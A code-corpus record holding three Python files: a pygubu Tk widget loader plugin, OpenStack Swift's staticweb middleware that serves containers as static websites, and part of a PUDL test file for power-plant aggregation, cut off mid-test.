Python
|
UTF-8
|
Python
| false
| false
| 443
|
py
|
__init__.py
|
from pygubu.api.v1 import BuilderLoaderPlugin
class StandardTKWidgetsLoader(BuilderLoaderPlugin):
_module = "pygubu.plugins.tk.tkstdwidgets"
def do_activate(self) -> bool:
return True
def get_module_for(self, identifier: str) -> str:
return self._module
def get_all_modules(self):
return (self._module,)
def can_load(self, identifier: str) -> bool:
return identifier.startswith("tk.")
|
5139851a8762b8b98399a781ccbd102191beb5e2
|
3daa53a2190f365ee2e2acae39ca4e84919f2f50
|
/swift/common/middleware/staticweb.py
|
c01f720f14e4ae123a829bac317dd456048c6ba1
|
[
"Apache-2.0"
] |
permissive
|
openstack/swift
|
4c8e4a14c1c6f7efb049f983ede28e89bd2e9140
|
f06e5369579599648cc78e4b556887bc6d978c2b
|
refs/heads/master
| 2023-08-28T15:04:33.200849
| 2023-08-24T20:35:07
| 2023-08-24T21:05:48
| 790,019
| 2,370
| 957
|
Apache-2.0
| 2023-06-22T02:45:53
| 2010-07-22T01:50:07
|
Python
|
UTF-8
|
Python
| false
| false
| 24,807
|
py
|
staticweb.py
|
# Copyright (c) 2010-2016 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This StaticWeb WSGI middleware will serve container data as a static web site
with index file and error file resolution and optional file listings. This mode
is normally only active for anonymous requests. When using keystone for
authentication set ``delay_auth_decision = true`` in the authtoken middleware
configuration in your ``/etc/swift/proxy-server.conf`` file. If you want to
use it with authenticated requests, set the ``X-Web-Mode: true`` header on the
request.
The ``staticweb`` filter should be added to the pipeline in your
``/etc/swift/proxy-server.conf`` file just after any auth middleware. Also, the
configuration section for the ``staticweb`` middleware itself needs to be
added. For example::
[DEFAULT]
...
[pipeline:main]
pipeline = catch_errors healthcheck proxy-logging cache ratelimit tempauth
staticweb proxy-logging proxy-server
...
[filter:staticweb]
use = egg:swift#staticweb
Any publicly readable containers (for example, ``X-Container-Read: .r:*``, see
:ref:`acls` for more information on this) will be checked for
X-Container-Meta-Web-Index and X-Container-Meta-Web-Error header values::
X-Container-Meta-Web-Index <index.name>
X-Container-Meta-Web-Error <error.name.suffix>
If X-Container-Meta-Web-Index is set, any <index.name> files will be served
without having to specify the <index.name> part. For instance, setting
``X-Container-Meta-Web-Index: index.html`` will be able to serve the object
.../pseudo/path/index.html with just .../pseudo/path or .../pseudo/path/
If X-Container-Meta-Web-Error is set, any errors (currently just 401
Unauthorized and 404 Not Found) will instead serve the
.../<status.code><error.name.suffix> object. For instance, setting
``X-Container-Meta-Web-Error: error.html`` will serve .../404error.html for
requests for paths not found.
For pseudo paths that have no <index.name>, this middleware can serve HTML file
listings if you set the ``X-Container-Meta-Web-Listings: true`` metadata item
on the container.
If listings are enabled, the listings can have a custom style sheet by setting
the X-Container-Meta-Web-Listings-CSS header. For instance, setting
``X-Container-Meta-Web-Listings-CSS: listing.css`` will make listings link to
the .../listing.css style sheet. If you "view source" in your browser on a
listing page, you will see the well defined document structure that can be
styled.
By default, the listings will be rendered with a label of
"Listing of /v1/account/container/path". This can be altered by
setting a ``X-Container-Meta-Web-Listings-Label: <label>``. For example,
if the label is set to "example.com", a label of
"Listing of example.com/path" will be used instead.
The content-type of directory marker objects can be modified by setting
the ``X-Container-Meta-Web-Directory-Type`` header. If the header is not set,
application/directory is used by default. Directory marker objects are
0-byte objects that represent directories to create a simulated hierarchical
structure.
Example usage of this middleware via ``swift``:
Make the container publicly readable::
swift post -r '.r:*' container
You should be able to get objects directly, but no index.html resolution or
listings.
Set an index file directive::
swift post -m 'web-index:index.html' container
You should be able to hit paths that have an index.html without needing to
type the index.html part.
Turn on listings::
swift post -r '.r:*,.rlistings' container
swift post -m 'web-listings: true' container
Now you should see object listings for paths and pseudo paths that have no
index.html.
Enable a custom listings style sheet::
swift post -m 'web-listings-css:listings.css' container
Set an error file::
swift post -m 'web-error:error.html' container
Now 401's should load 401error.html, 404's should load 404error.html, etc.
Set Content-Type of directory marker object::
swift post -m 'web-directory-type:text/directory' container
Now 0-byte objects with a content-type of text/directory will be treated
as directories rather than objects.
"""
import json
import six
import time
from six.moves.urllib.parse import urlparse
from swift.common.request_helpers import html_escape
from swift.common.utils import human_readable, split_path, config_true_value, \
quote, get_logger
from swift.common.registry import register_swift_info
from swift.common.wsgi import make_env, WSGIContext
from swift.common.http import is_success, is_redirection, HTTP_NOT_FOUND
from swift.common.swob import Response, HTTPMovedPermanently, HTTPNotFound, \
Request, wsgi_quote, wsgi_to_str, str_to_wsgi
from swift.proxy.controllers.base import get_container_info
class _StaticWebContext(WSGIContext):
"""
The Static Web WSGI middleware filter; serves container data as a
static web site. See `staticweb`_ for an overview.
This _StaticWebContext is used by StaticWeb with each request
that might need to be handled to make keeping contextual
information about the request a bit simpler than storing it in
the WSGI env.
:param staticweb: The staticweb middleware object in use.
:param version: A WSGI string representation of the swift api version.
:param account: A WSGI string representation of the account name.
:param container: A WSGI string representation of the container name.
:param obj: A WSGI string representation of the object name.
"""
def __init__(self, staticweb, version, account, container, obj):
WSGIContext.__init__(self, staticweb.app)
self.version = version
self.account = account
self.container = container
self.obj = obj
self.app = staticweb.app
self.url_scheme = staticweb.url_scheme
self.url_host = staticweb.url_host
self.agent = '%(orig)s StaticWeb'
# Results from the last call to self._get_container_info.
self._index = self._error = self._listings = self._listings_css = \
self._dir_type = self._listings_label = None
def _error_response(self, response, env, start_response):
"""
Sends the error response to the remote client, possibly resolving a
custom error response body based on x-container-meta-web-error.
:param response: The error response we should default to sending.
:param env: The original request WSGI environment.
:param start_response: The WSGI start_response hook.
"""
if not self._error:
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return response
save_response_status = self._response_status
save_response_headers = self._response_headers
save_response_exc_info = self._response_exc_info
resp = self._app_call(make_env(
env, 'GET', '/%s/%s/%s/%s%s' % (
self.version, self.account, self.container,
self._get_status_int(), self._error),
self.agent, swift_source='SW'))
if is_success(self._get_status_int()):
start_response(save_response_status, self._response_headers,
self._response_exc_info)
return resp
start_response(save_response_status, save_response_headers,
save_response_exc_info)
return response
def _get_container_info(self, env):
"""
Retrieves x-container-meta-web-index, x-container-meta-web-error,
x-container-meta-web-listings, x-container-meta-web-listings-css,
and x-container-meta-web-directory-type from memcache or from the
cluster and stores the result in memcache and in self._index,
self._error, self._listings, self._listings_css and self._dir_type.
:param env: The WSGI environment dict.
:return: The container_info dict.
"""
self._index = self._error = self._listings = self._listings_css = \
self._dir_type = None
container_info = get_container_info(
env, self.app, swift_source='SW')
if is_success(container_info['status']):
meta = container_info.get('meta', {})
self._index = meta.get('web-index', '').strip()
self._error = meta.get('web-error', '').strip()
self._listings = meta.get('web-listings', '').strip()
self._listings_label = meta.get('web-listings-label', '').strip()
self._listings_css = meta.get('web-listings-css', '').strip()
self._dir_type = meta.get('web-directory-type', '').strip()
return container_info
def _listing(self, env, start_response, prefix=None):
"""
Sends an HTML object listing to the remote client.
:param env: The original WSGI environment dict.
:param start_response: The original WSGI start_response hook.
:param prefix: Any WSGI-str prefix desired for the container listing.
"""
label = wsgi_to_str(env['PATH_INFO'])
if self._listings_label:
groups = wsgi_to_str(env['PATH_INFO']).split('/')
label = '{0}/{1}'.format(self._listings_label,
'/'.join(groups[4:]))
if not config_true_value(self._listings):
body = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 ' \
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n' \
'<html>\n' \
'<head>\n' \
'<title>Listing of %s</title>\n' % html_escape(label)
if self._listings_css:
body += ' <link rel="stylesheet" type="text/css" ' \
'href="%s" />\n' % self._build_css_path(prefix or '')
else:
body += ' <style type="text/css">\n' \
' h1 {font-size: 1em; font-weight: bold;}\n' \
' p {font-size: 2}\n' \
' </style>\n'
body += '</head>\n<body>' \
' <h1>Web Listing Disabled</h1>' \
' <p>The owner of this web site has disabled web listing.' \
' <p>If you are the owner of this web site, you can enable' \
' web listing by setting X-Container-Meta-Web-Listings.</p>'
if self._index:
body += '<h1>Index File Not Found</h1>' \
' <p>The owner of this web site has set ' \
' <b>X-Container-Meta-Web-Index: %s</b>. ' \
' However, this file is not found.</p>' % self._index
body += ' </body>\n</html>\n'
resp = HTTPNotFound(body=body)(env, self._start_response)
return self._error_response(resp, env, start_response)
tmp_env = make_env(
env, 'GET', '/%s/%s/%s' % (
self.version, self.account, self.container),
self.agent, swift_source='SW')
tmp_env['QUERY_STRING'] = 'delimiter=/'
if prefix:
tmp_env['QUERY_STRING'] += '&prefix=%s' % wsgi_quote(prefix)
else:
prefix = ''
resp = self._app_call(tmp_env)
if not is_success(self._get_status_int()):
return self._error_response(resp, env, start_response)
listing = None
body = b''.join(resp)
if body:
listing = json.loads(body)
if prefix and not listing:
resp = HTTPNotFound()(env, self._start_response)
return self._error_response(resp, env, start_response)
headers = {'Content-Type': 'text/html; charset=UTF-8'}
body = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 ' \
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n' \
'<html>\n' \
' <head>\n' \
' <title>Listing of %s</title>\n' % \
html_escape(label)
if self._listings_css:
body += ' <link rel="stylesheet" type="text/css" ' \
'href="%s" />\n' % (self._build_css_path(prefix))
else:
body += ' <style type="text/css">\n' \
' h1 {font-size: 1em; font-weight: bold;}\n' \
' th {text-align: left; padding: 0px 1em 0px 1em;}\n' \
' td {padding: 0px 1em 0px 1em;}\n' \
' a {text-decoration: none;}\n' \
' </style>\n'
body += ' </head>\n' \
' <body>\n' \
' <h1 id="title">Listing of %s</h1>\n' \
' <table id="listing">\n' \
' <tr id="heading">\n' \
' <th class="colname">Name</th>\n' \
' <th class="colsize">Size</th>\n' \
' <th class="coldate">Date</th>\n' \
' </tr>\n' % html_escape(label)
if prefix:
body += ' <tr id="parent" class="item">\n' \
' <td class="colname"><a href="../">../</a></td>\n' \
' <td class="colsize"> </td>\n' \
' <td class="coldate"> </td>\n' \
' </tr>\n'
for item in listing:
if 'subdir' in item:
subdir = item['subdir'] if six.PY3 else \
item['subdir'].encode('utf-8')
if prefix:
subdir = subdir[len(wsgi_to_str(prefix)):]
body += ' <tr class="item subdir">\n' \
' <td class="colname"><a href="%s">%s</a></td>\n' \
' <td class="colsize"> </td>\n' \
' <td class="coldate"> </td>\n' \
' </tr>\n' % \
(quote(subdir), html_escape(subdir))
for item in listing:
if 'name' in item:
name = item['name'] if six.PY3 else \
item['name'].encode('utf-8')
if prefix:
name = name[len(wsgi_to_str(prefix)):]
content_type = item['content_type'] if six.PY3 else \
item['content_type'].encode('utf-8')
bytes = human_readable(item['bytes'])
last_modified = (
html_escape(item['last_modified'] if six.PY3 else
item['last_modified'].encode('utf-8')).
split('.')[0].replace('T', ' '))
body += ' <tr class="item %s">\n' \
' <td class="colname"><a href="%s">%s</a></td>\n' \
' <td class="colsize">%s</td>\n' \
' <td class="coldate">%s</td>\n' \
' </tr>\n' % \
(' '.join('type-' + html_escape(t.lower())
for t in content_type.split('/')),
quote(name), html_escape(name),
bytes, last_modified)
body += ' </table>\n' \
' </body>\n' \
'</html>\n'
resp = Response(headers=headers, body=body)
return resp(env, start_response)
def _build_css_path(self, prefix=''):
"""
Constructs a relative path from a given prefix within the container.
URLs and paths starting with '/' are not modified.
:param prefix: The prefix for the container listing.
"""
if self._listings_css.startswith(('/', 'http://', 'https://')):
css_path = quote(self._listings_css, ':/')
else:
css_path = '../' * prefix.count('/') + quote(self._listings_css)
return css_path
def _redirect_with_slash(self, env_, start_response):
env = {}
env.update(env_)
if self.url_scheme:
env['wsgi.url_scheme'] = self.url_scheme
if self.url_host:
env['HTTP_HOST'] = self.url_host
resp = HTTPMovedPermanently(
location=wsgi_quote(env['PATH_INFO'] + '/'))
return resp(env, start_response)
def handle_container(self, env, start_response):
"""
Handles a possible static web request for a container.
:param env: The original WSGI environment dict.
:param start_response: The original WSGI start_response hook.
"""
container_info = self._get_container_info(env)
req = Request(env)
req.acl = container_info['read_acl']
# we checked earlier that swift.authorize is set in env
aresp = env['swift.authorize'](req)
if aresp:
resp = aresp(env, self._start_response)
return self._error_response(resp, env, start_response)
if not self._listings and not self._index:
if config_true_value(env.get('HTTP_X_WEB_MODE', 'f')):
return HTTPNotFound()(env, start_response)
return self.app(env, start_response)
if not env['PATH_INFO'].endswith('/'):
return self._redirect_with_slash(env, start_response)
if not self._index:
return self._listing(env, start_response)
tmp_env = dict(env)
tmp_env['HTTP_USER_AGENT'] = \
'%s StaticWeb' % env.get('HTTP_USER_AGENT')
tmp_env['swift.source'] = 'SW'
tmp_env['PATH_INFO'] += str_to_wsgi(self._index)
resp = self._app_call(tmp_env)
status_int = self._get_status_int()
if status_int == HTTP_NOT_FOUND:
return self._listing(env, start_response)
elif not is_success(self._get_status_int()) and \
not is_redirection(self._get_status_int()):
return self._error_response(resp, env, start_response)
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
def handle_object(self, env, start_response):
"""
Handles a possible static web request for an object. This object could
resolve into an index or listing request.
:param env: The original WSGI environment dict.
:param start_response: The original WSGI start_response hook.
"""
tmp_env = dict(env)
tmp_env['HTTP_USER_AGENT'] = \
'%s StaticWeb' % env.get('HTTP_USER_AGENT')
tmp_env['swift.source'] = 'SW'
resp = self._app_call(tmp_env)
status_int = self._get_status_int()
self._get_container_info(env)
if is_success(status_int) or is_redirection(status_int):
# Treat directory marker objects as not found
if not self._dir_type:
self._dir_type = 'application/directory'
content_length = self._response_header_value('content-length')
content_length = int(content_length) if content_length else 0
if self._response_header_value('content-type') == self._dir_type \
and content_length <= 1:
status_int = HTTP_NOT_FOUND
else:
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
if status_int != HTTP_NOT_FOUND:
# Retaining the previous code's behavior of not using custom error
# pages for non-404 errors.
self._error = None
return self._error_response(resp, env, start_response)
if not self._listings and not self._index:
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
status_int = HTTP_NOT_FOUND
if self._index:
tmp_env = dict(env)
tmp_env['HTTP_USER_AGENT'] = \
'%s StaticWeb' % env.get('HTTP_USER_AGENT')
tmp_env['swift.source'] = 'SW'
if not tmp_env['PATH_INFO'].endswith('/'):
tmp_env['PATH_INFO'] += '/'
tmp_env['PATH_INFO'] += str_to_wsgi(self._index)
resp = self._app_call(tmp_env)
status_int = self._get_status_int()
if is_success(status_int) or is_redirection(status_int):
if not env['PATH_INFO'].endswith('/'):
return self._redirect_with_slash(env, start_response)
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
if status_int == HTTP_NOT_FOUND:
if not env['PATH_INFO'].endswith('/'):
tmp_env = make_env(
env, 'GET', '/%s/%s/%s' % (
self.version, self.account, self.container),
self.agent, swift_source='SW')
tmp_env['QUERY_STRING'] = 'limit=1&delimiter=/&prefix=%s' % (
quote(wsgi_to_str(self.obj) + '/'), )
resp = self._app_call(tmp_env)
body = b''.join(resp)
if not is_success(self._get_status_int()) or not body or \
not json.loads(body):
resp = HTTPNotFound()(env, self._start_response)
return self._error_response(resp, env, start_response)
return self._redirect_with_slash(env, start_response)
return self._listing(env, start_response, self.obj)
class StaticWeb(object):
"""
The Static Web WSGI middleware filter; serves container data as a static
web site. See `staticweb`_ for an overview.
The proxy logs created for any subrequests made will have swift.source set
to "SW".
:param app: The next WSGI application/filter in the paste.deploy pipeline.
:param conf: The filter configuration dict.
"""
def __init__(self, app, conf):
#: The next WSGI application/filter in the paste.deploy pipeline.
self.app = app
#: The filter configuration dict. Only used in tests.
self.conf = conf
self.logger = get_logger(conf, log_route='staticweb')
# We expose a more general "url_base" parameter in case we want
# to incorporate the path prefix later. Currently it is discarded.
url_base = conf.get('url_base', None)
self.url_scheme = None
self.url_host = None
if url_base:
parsed = urlparse(url_base)
self.url_scheme = parsed.scheme
self.url_host = parsed.netloc
def __call__(self, env, start_response):
"""
Main hook into the WSGI paste.deploy filter/app pipeline.
:param env: The WSGI environment dict.
:param start_response: The WSGI start_response hook.
"""
env['staticweb.start_time'] = time.time()
if 'swift.authorize' not in env:
self.logger.warning(
'No authentication middleware authorized request yet. '
'Skipping staticweb')
return self.app(env, start_response)
try:
(version, account, container, obj) = \
split_path(env['PATH_INFO'], 2, 4, True)
except ValueError:
return self.app(env, start_response)
if env['REQUEST_METHOD'] not in ('HEAD', 'GET'):
return self.app(env, start_response)
if env.get('REMOTE_USER') and \
not config_true_value(env.get('HTTP_X_WEB_MODE', 'f')):
return self.app(env, start_response)
if not container:
return self.app(env, start_response)
context = _StaticWebContext(self, version, account, container, obj)
if obj:
return context.handle_object(env, start_response)
return context.handle_container(env, start_response)
def filter_factory(global_conf, **local_conf):
"""Returns a Static Web WSGI filter for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
register_swift_info('staticweb')
def staticweb_filter(app):
return StaticWeb(app, conf)
return staticweb_filter
|
2532acae561f9626448d6ff9e8e297e668e75cbb
|
4e82d8497d6457cc47ade28494970d89e540aca5
|
/test/unit/analysis/plant_parts_eia_test.py
|
c333f59185a050910ecab6e26d6bb4d30507b6ac
|
[
"CC-BY-4.0",
"MIT"
] |
permissive
|
catalyst-cooperative/pudl
|
28f721a0caced2f50485fbba1b7c78f4465b2539
|
6afae8aade053408f23ac4332d5cbb438ab72dc6
|
refs/heads/main
| 2023-08-16T11:46:45.249665
| 2023-08-15T01:37:01
| 2023-08-15T01:37:01
| 80,646,423
| 382
| 101
|
MIT
| 2023-09-13T21:27:33
| 2017-02-01T17:45:40
|
Python
|
UTF-8
|
Python
| false
| false
| 21,551
|
py
|
plant_parts_eia_test.py
|
"""Tests for timeseries anomalies detection and imputation."""
from importlib import resources
from typing import Literal
import pandas as pd
import pudl
import pudl.analysis.plant_parts_eia
GENS_MEGA = pd.DataFrame(
{
"plant_id_eia": [1, 1, 1, 1],
"report_date": ["2020-01-01", "2020-01-01", "2020-01-01", "2020-01-01"],
"utility_id_eia": [111, 111, 111, 111],
"generator_id": ["a", "b", "c", "d"],
"prime_mover_code": ["ST", "GT", "CT", "CA"],
"energy_source_code_1": ["BIT", "NG", "NG", "NG"],
"ownership_record_type": [
"total",
"total",
"total",
"total",
],
"operational_status_pudl": ["operating", "operating", "operating", "operating"],
"capacity_mw": [400, 50, 125, 75],
}
).astype({"report_date": "datetime64[ns]"})
def test_plant_ag():
"""Test aggregation of the plant-part part list by plant.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant
plant_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": [1],
"report_date": ["2020-01-01"],
"operational_status_pudl": ["operating"],
"utility_id_eia": [111],
"ownership_record_type": ["total"],
"capacity_mw": [650.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(plant_ag_out, plant_ag_expected)
def test_prime_fuel_ag():
"""Test aggregation of the plant-part part list by prime fuel.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant prime fuel
plant_primary_fuel_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant_prime_fuel")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_primary_fuel_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"energy_source_code_1": ["BIT", "NG"],
"report_date": "2020-01-01",
"operational_status_pudl": "operating",
"utility_id_eia": 111,
"ownership_record_type": "total",
"capacity_mw": [400.0, 250.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(
plant_primary_fuel_ag_out, plant_primary_fuel_ag_expected
)
def test_prime_mover_ag():
"""Test aggregation of the plant-part part list by prime mover.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant prime mover
plant_prime_mover_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant_prime_mover")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_prime_mover_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"prime_mover_code": ["CA", "CT", "GT", "ST"],
"report_date": "2020-01-01",
"operational_status_pudl": "operating",
"utility_id_eia": 111,
"ownership_record_type": "total",
"capacity_mw": [75.0, 125.0, 50.0, 400.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(
plant_prime_mover_ag_out, plant_prime_mover_ag_expected
)
def test_plant_gen_ag():
"""Test aggregation of the plant-part part list by generator.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant gen
plant_gen_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant_gen")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_gen_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"generator_id": ["a", "b", "c", "d"],
"report_date": "2020-01-01",
"operational_status_pudl": "operating",
"utility_id_eia": 111,
"ownership_record_type": "total",
"capacity_mw": [400.0, 50.0, 125.0, 75.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(plant_gen_ag_out, plant_gen_ag_expected)
def test_make_mega_gen_tbl():
"""Test the creation of the mega generator table.
Integrates ownership with generators.
"""
# one plant with three generators
mcoe = pd.DataFrame(
{
"plant_id_eia": 1,
"report_date": "2020-01-01",
"generator_id": ["a", "b", "c"],
"utility_id_eia": [111, 111, 111],
"unit_id_pudl": 1,
"prime_mover_code": ["CT", "CT", "CA"],
"technology_description": "Natural Gas Fired Combined Cycle",
"operational_status": "existing",
"generator_retirement_date": pd.NA,
"capacity_mw": [50, 50, 100],
"generator_operating_date": "2001-12-01",
}
).astype(
{
"generator_retirement_date": "datetime64[ns]",
"report_date": "datetime64[ns]",
"generator_operating_date": "datetime64[ns]",
}
)
# one record for every owner of each generator
df_own_eia860 = pd.DataFrame(
{
"plant_id_eia": 1,
"report_date": "2020-01-01",
"generator_id": ["a", "b", "c", "c"],
"utility_id_eia": 111,
"owner_utility_id_eia": [111, 111, 111, 888],
"fraction_owned": [1, 1, 0.75, 0.25],
}
).astype({"report_date": "datetime64[ns]"})
out = pudl.analysis.plant_parts_eia.MakeMegaGenTbl().execute(
mcoe, df_own_eia860, slice_cols=["capacity_mw"]
)
out_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"report_date": "2020-01-01",
"generator_id": ["a", "b", "c", "c", "a", "b", "c", "c"],
"unit_id_pudl": 1,
"prime_mover_code": ["CT", "CT", "CA", "CA", "CT", "CT", "CA", "CA"],
"technology_description": "Natural Gas Fired Combined Cycle",
"operational_status": "existing",
"generator_retirement_date": pd.NaT,
"capacity_mw": [50.0, 50.0, 75.0, 25.0, 50.0, 50.0, 100.0, 100.0],
"generator_operating_date": "2001-12-01",
"ferc_acct_name": "Other",
"generator_operating_year": 2001,
"operational_status_pudl": "operating",
"capacity_eoy_mw": [50, 50, 100, 100, 50, 50, 100, 100],
"fraction_owned": [1.00, 1.00, 0.75, 0.25, 1.00, 1.00, 1.00, 1.00],
"utility_id_eia": [111, 111, 111, 888, 111, 111, 111, 888],
"ownership_record_type": [
"owned",
"owned",
"owned",
"owned",
"total",
"total",
"total",
"total",
],
}
)
.astype(
{
"generator_retirement_date": "datetime64[ns]",
"report_date": "datetime64[ns]",
"generator_operating_date": "datetime64[ns]",
"generator_operating_year": "Int64",
"utility_id_eia": "Int64", # convert to pandas Int64 instead of numpy int64
}
)
.set_index([[0, 1, 2, 3, 0, 1, 2, 3]])
)
pd.testing.assert_frame_equal(out, out_expected)
def test_scale_by_ownership():
"""Test the scale_by_ownership method."""
dtypes = {"report_date": "datetime64[ns]", "utility_id_eia": pd.Int64Dtype()}
own_ex1 = pd.DataFrame(
{
"plant_id_eia": [1, 1, 1, 1],
"report_date": ["2019-01-01", "2019-01-01", "2019-01-01", "2019-01-01"],
"generator_id": ["a", "a", "b", "b"],
"utility_id_eia": [3, 3, 3, 3],
"owner_utility_id_eia": [3, 4, 3, 4],
"fraction_owned": [0.7, 0.3, 0.1, 0.9],
},
).astype(dtypes)
gens_mega_ex1 = pd.DataFrame(
{
"plant_id_eia": [1, 1],
"report_date": [
"2019-01-01",
"2019-01-01",
],
"generator_id": [
"a",
"b",
],
"utility_id_eia": [
3,
3,
],
"total_fuel_cost": [4500, 1250],
"net_generation_mwh": [10000, 5000],
"capacity_mw": [100, 50],
"capacity_eoy_mw": [100, 50],
"total_mmbtu": [9000, 7800],
},
).astype(dtypes)
out_ex1 = pd.DataFrame(
{
"plant_id_eia": [
1,
1,
1,
1,
1,
1,
1,
1,
],
"report_date": [
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
],
"generator_id": [
"a",
"a",
"b",
"b",
"a",
"a",
"b",
"b",
],
"total_fuel_cost": [
4500 * 0.7,
4500 * 0.3,
1250 * 0.1,
1250 * 0.9,
4500,
4500,
1250,
1250,
],
"net_generation_mwh": [
10000 * 0.7,
10000 * 0.3,
5000 * 0.1,
5000 * 0.9,
10000,
10000,
5000,
5000,
],
"capacity_mw": [
100 * 0.7,
100 * 0.3,
50 * 0.1,
50 * 0.9,
100,
100,
50,
50,
],
"capacity_eoy_mw": [
100 * 0.7,
100 * 0.3,
50 * 0.1,
50 * 0.9,
100,
100,
50,
50,
],
"total_mmbtu": [
9000 * 0.7,
9000 * 0.3,
7800 * 0.1,
7800 * 0.9,
9000,
9000,
7800,
7800,
],
"fraction_owned": [0.7, 0.3, 0.1, 0.9, 1, 1, 1, 1],
"utility_id_eia": [3, 4, 3, 4, 3, 4, 3, 4],
"ownership_record_type": [
"owned",
"owned",
"owned",
"owned",
"total",
"total",
"total",
"total",
],
},
).astype(dtypes)
scale_cols = [
"total_fuel_cost",
"net_generation_mwh",
"capacity_mw",
"capacity_eoy_mw",
"total_mmbtu",
]
out = pudl.helpers.scale_by_ownership(
gens=gens_mega_ex1, own_eia860=own_ex1, scale_cols=scale_cols
).reset_index(drop=True)
pd.testing.assert_frame_equal(out_ex1, out)
def test_label_true_grans():
"""Test the labeling of true granularities in the plant part list."""
plant_part_list_input = pd.DataFrame(
{
"report_date": ["2020-01-01"] * 9,
"record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"gen_1",
"gen_2",
"gen_3",
"gen_4",
"tech_nat_gas",
"match_gen2_4",
],
"plant_id_eia": [3] * 9,
"plant_part": [
"plant",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_technology",
"plant_match_ferc1",
],
"generator_id": [None, None, None, 1, 2, 3, 4, None, None],
"unit_id_pudl": [None, "A", "B", "A", "B", "B", "B", None, None],
"technology_description": ["nat_gas"] * 9,
"operational_status_pudl": [None] * 9,
"utility_id_eia": [None] * 9,
"ownership_record_type": [None] * 9,
"prime_mover_code": [None] * 9,
"ferc_acct_name": [None] * 9,
"energy_source_code_1": [None] * 9,
"generator_operating_year": [None] * 9,
"installation_year": [None] * 9,
"construction_year": [None] * 9,
"ferc1_generator_agg_id": [None, None, None, None, 0, None, 0, None, 0],
}
).astype({"report_date": "datetime64[ns]"})
true_grans = pd.DataFrame(
{
"true_gran": [True, True, True, False, True, True, True, False, True],
"appro_record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"unit_a",
"gen_2",
"gen_3",
"gen_4",
"plant_3",
"match_gen2_4",
],
"appro_part_label": [
"plant",
"plant_unit",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant",
"plant_match_ferc1",
],
}
).astype({"appro_part_label": "string"})
expected_out = pd.concat([plant_part_list_input, true_grans], axis=1)
out = pudl.analysis.plant_parts_eia.TrueGranLabeler().execute(plant_part_list_input)
pd.testing.assert_frame_equal(expected_out, out)
class PudlTablMock:
"""Mock ``pudl_out`` object."""
freq: Literal["AS", "MS"]
def __init__(
self,
freq="AS",
):
self.freq = freq
def execute(self):
return self
def test_one_to_many():
plant_part_list_input = pd.DataFrame(
{
"report_date": ["2020-01-01"] * 8,
"record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"gen_1",
"gen_2",
"gen_3",
"gen_4",
"tech_nat_gas",
],
"plant_id_eia": [3] * 8,
"plant_name_eia": ["sparky"] * 8,
"plant_part": [
"plant",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_technology",
],
"generator_id": [None, None, None, 1, 2, 3, 4, None],
"unit_id_pudl": [1, 1, 2, 1, 2, 2, 2, 2],
"technology_description": ["nat_gas"] * 8,
"operational_status": ["operating"] * 8,
"operational_status_pudl": ["operating"] * 8,
"utility_id_eia": [1] * 8,
"ownership_record_type": ["total"] * 8,
"prime_mover_code": ["ch"] * 8,
"ferc_acct_name": ["test"] * 8,
"energy_source_code_1": ["source"] * 8,
"generator_operating_year": [1979] * 8,
"installation_year": [1979] * 8,
"construction_year": [1979] * 8,
"capacity_mw": [300] * 8,
"capacity_eoy_mw": [300] * 8,
"total_mmbtu": [10] * 8,
"net_generation_mwh": [100] * 8,
"total_fuel_cost": [100] * 8,
